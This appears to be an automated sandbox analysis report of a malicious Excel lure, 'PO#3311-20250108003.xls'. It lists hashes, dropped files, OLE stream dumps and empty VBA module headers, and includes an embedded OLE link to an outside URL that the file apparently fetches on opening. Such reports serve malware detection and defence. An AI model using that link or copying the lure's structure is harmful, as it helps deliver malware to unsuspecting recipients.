                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jan 8 08:56:10 2025, Security: 1
                  Category:dropped
                  Size (bytes):148480
                  Entropy (8bit):7.098267715383656
                  Encrypted:false
                  SSDEEP:3072:Gqbrrgk3hbdlylKsgwyzcTbWhZFGkE+cugL80dDUQnzPOamJ3GJUELrfc368VEva:Uk3hbdlylKsgwyzcTbWhZFVE+fgL80dY
                  MD5:6991505EEF49D467D6FED11DABE967D9
                  SHA1:0563263B791DE1CD284D97B0EC690D86994ED097
                  SHA-256:A9AD00C3EDF7F450441D6F1FFB6511DEA9DCB7BD3240A9376E71CD37A60CBF60
                  SHA-512:6CF84048137C1A05F58BEF8CA7AB5F8576D2CA793D1EC38B6F13F18A3915E2FBD219153A5CD9239EA81650D6D9B893D3A1959B750E12DEB50F00443D896F6F43
                  Malicious:false
                  Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jan 8 08:56:10 2025, Security: 1
                  Category:dropped
                  Size (bytes):148480
                  Entropy (8bit):7.098267715383656
                  Encrypted:false
                  SSDEEP:3072:Gqbrrgk3hbdlylKsgwyzcTbWhZFGkE+cugL80dDUQnzPOamJ3GJUELrfc368VEva:Uk3hbdlylKsgwyzcTbWhZFVE+fgL80dY
                  MD5:6991505EEF49D467D6FED11DABE967D9
                  SHA1:0563263B791DE1CD284D97B0EC690D86994ED097
                  SHA-256:A9AD00C3EDF7F450441D6F1FFB6511DEA9DCB7BD3240A9376E71CD37A60CBF60
                  SHA-512:6CF84048137C1A05F58BEF8CA7AB5F8576D2CA793D1EC38B6F13F18A3915E2FBD219153A5CD9239EA81650D6D9B893D3A1959B750E12DEB50F00443D896F6F43
                  Malicious:true
                  Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 7 16:27:46 2025, Security: 1
                  Entropy (8bit):7.529109477538208
                  TrID:
                  • Microsoft Excel sheet (30009/1) 47.99%
                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                  File name:PO#3311-20250108003.xls
                  File size:231'936 bytes
                  MD5:6a899fecf09eb7899fd6a521aba5eb5e
                  SHA1:2f514a32ca1990347a42c4f3934afcab5a341530
                  SHA256:519cda9511738dfa6ad57a5716bd217d9c44af7023907711ddc76c4511f24d60
                  SHA512:7fd1002024b5ca418fb574274e4cf48492152218203bc36cced26f1611a9592eea8c1d79e3808172d77a2dc4d2773c075660a60f21711f2519045b754ce3154a
                  SSDEEP:6144:UZ+RwPONXoRjDhIcp0fDlavx+fgLt0d6IOXqgVIvn2iBU2ny0T+/Lvz:f7gVIvn3GeyTv
                  TLSH:F634F151F6C7C84AE90647364AF796E77322FC415F938B0B3298B70E6AB45C0A527723
                  File Content Preview:........................>...............................................................w......................................................................................................................................................................
                  Icon Hash:35ed8e920e8c81b5
                  Document Type:OLE
                  Number of OLE Files:1
                  Has Summary Info:
                  Application Name:Microsoft Excel
                  Encrypted Document:True
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:False
                  Flash Objects Count:0
                  Contains VBA Macros:True
                  Code Page:1252
                  Author:
                  Last Saved By:
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2025-01-07 16:27:46
                  Creating Application:Microsoft Excel
                  Security:1
                  Document Code Page:1252
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:786432
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                  VBA File Name:Sheet1.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 ; . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 35 91 3b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet1"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                  VBA File Name:Sheet2.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 N . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 35 4e cb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet2"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                  VBA File Name:Sheet3.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 L . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 35 4c ec 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet3"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                  VBA File Name:ThisWorkbook.cls
                  Stream Size:985
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 ) . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 35 87 29 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "ThisWorkbook"
                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:114
                  Entropy:4.25248375192737
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:244
                  Entropy:2.889430592781307
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                  General
                  Stream Path:\x5SummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:200
                  Entropy:3.2603503175049817
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . ~ . ! a . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                  General
                  Stream Path:MBD01010D3D/\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:114
                  Entropy:4.25248375192737
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD01010D3D/\x5DocumentSummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:708
                  Entropy:3.6235698530352805
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                  General
                  Stream Path:MBD01010D3D/\x5SummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:372
                  Entropy:2.9133459114787295
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                  General
                  Stream Path:MBD01010D3D/MBD00B0D551/\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:114
                  Entropy:4.219515110876372
                  Base64 Encoded:False
                  Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD01010D3D/MBD00B0D551/Package
                  CLSID:
                  File Type:Microsoft Excel 2007+
                  Stream Size:14238
                  Entropy:7.303580280986802
                  Base64 Encoded:True
                  Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD01010D3D/Workbook
                  CLSID:
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:105412
                  Entropy:7.421944967303672
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  General
                  Stream Path:MBD01010D3E/\x1Ole
                  CLSID:
                  File Type:data
                  Stream Size:814
                  Entropy:5.386624507348723
                  Base64 Encoded:False
                  Data ASCII:. . . . K . . 0 M z o . . . . . . . . . . . . P . . . y . . . K . L . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . f . m . G . Z . a . V . n . S . ? . & . b . u . s . h . = . w . a . t . c . h . f . u . l . & . g . r . a . n . d . m . o . m . = . a . d . j . o . i . n . i . n . g . & . h . a . c . k . w . o . r . k . . . A p M { T f . . ] Q . r * . d $ k I # . . . . + U . . | Z E . . . E E . f , U ( I = X G . X K X W N { c x z . p ^ . C . 7 e | K . ' ' o . I N .
                  Data Raw:01 00 00 02 4b 0b 07 30 4d c4 7a 6f 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 4c 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 66 00 6d 00 47 00 5a 00 61 00 56 00 6e 00 53 00 3f 00 26 00 62 00 75 00 73 00 68 00 3d 00 77 00 61 00 74 00 63 00
                  General
                  Stream Path:Workbook
                  CLSID:
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:93622
                  Entropy:7.991014695555721
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . D ( < 8 & x 3 & R } 2 q [ . . . . . & R . g e s $ . . . . . . . . . . \\ . p . ? 0 < v O . Q . . 0 Q ' . + . = ? 2 I K K ` i m . T . . K o . . G U N > k < X . B < . h . . S 4 _ $ K ` r . r B . . . a . . . 8 . . . = . . . v R w . . . b o o ' . . . . . . . . . . . . . . . j " . . . a . . . . B = . . . q . . f . . 2 @ . . . 5 c . . . " . . . . . . . . W . . . . . . . 1 . . . . S , c 1 k 2 r t . B c . . $ . 1 . . . V G z : T R 3 H D 2 1 + 2 L p . . h ( . b
                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 44 28 3c 38 26 a9 ca cf ec 78 33 86 26 b6 a2 b6 52 7d 32 cd 71 5b 1f dc 20 a6 2e 85 84 04 e7 8a af 06 26 52 e6 cd 98 67 9c 65 9d ec 73 97 24 ac e1 00 02 00 b0 04 c1 00 02 00 85 99 e2 00 00 00 5c 00 70 00 3f a0 30 3c 76 4f 06 51 1a bf 03 af ec 30 a5 ab 51 ca 27 1b 88 f4 2b 8d ab e4 c9 86 8b 9c
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                  CLSID:
                  File Type:ASCII text, with CRLF line terminators
                  Stream Size:523
                  Entropy:5.170198522769169
                  Base64 Encoded:True
                  Data ASCII:I D = " { 0 E A 8 D A 3 C - 6 9 9 A - 4 2 3 B - 9 3 C C - D 2 D 2 3 1 C 2 1 0 F 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 2 D 0 2 2 3 8 1 E 3 C 1 E 3 C 1
                  Data Raw:49 44 3d 22 7b 30 45 41 38 44 41 33 43 2d 36 39 39 41 2d 34 32 33 42 2d 39 33 43 43 2d 44 32 44 32 33 31 43 32 31 30 46 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                  CLSID:
                  File Type:data
                  Stream Size:104
                  Entropy:3.0488640812019017
                  Base64 Encoded:False
                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                  CLSID:
                  File Type:data
                  Stream Size:2644
                  Entropy:3.998076288976716
                  Base64 Encoded:False
                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                  CLSID:
                  File Type:data
                  Stream Size:553
                  Entropy:6.374192764178085
                  Base64 Encoded:True
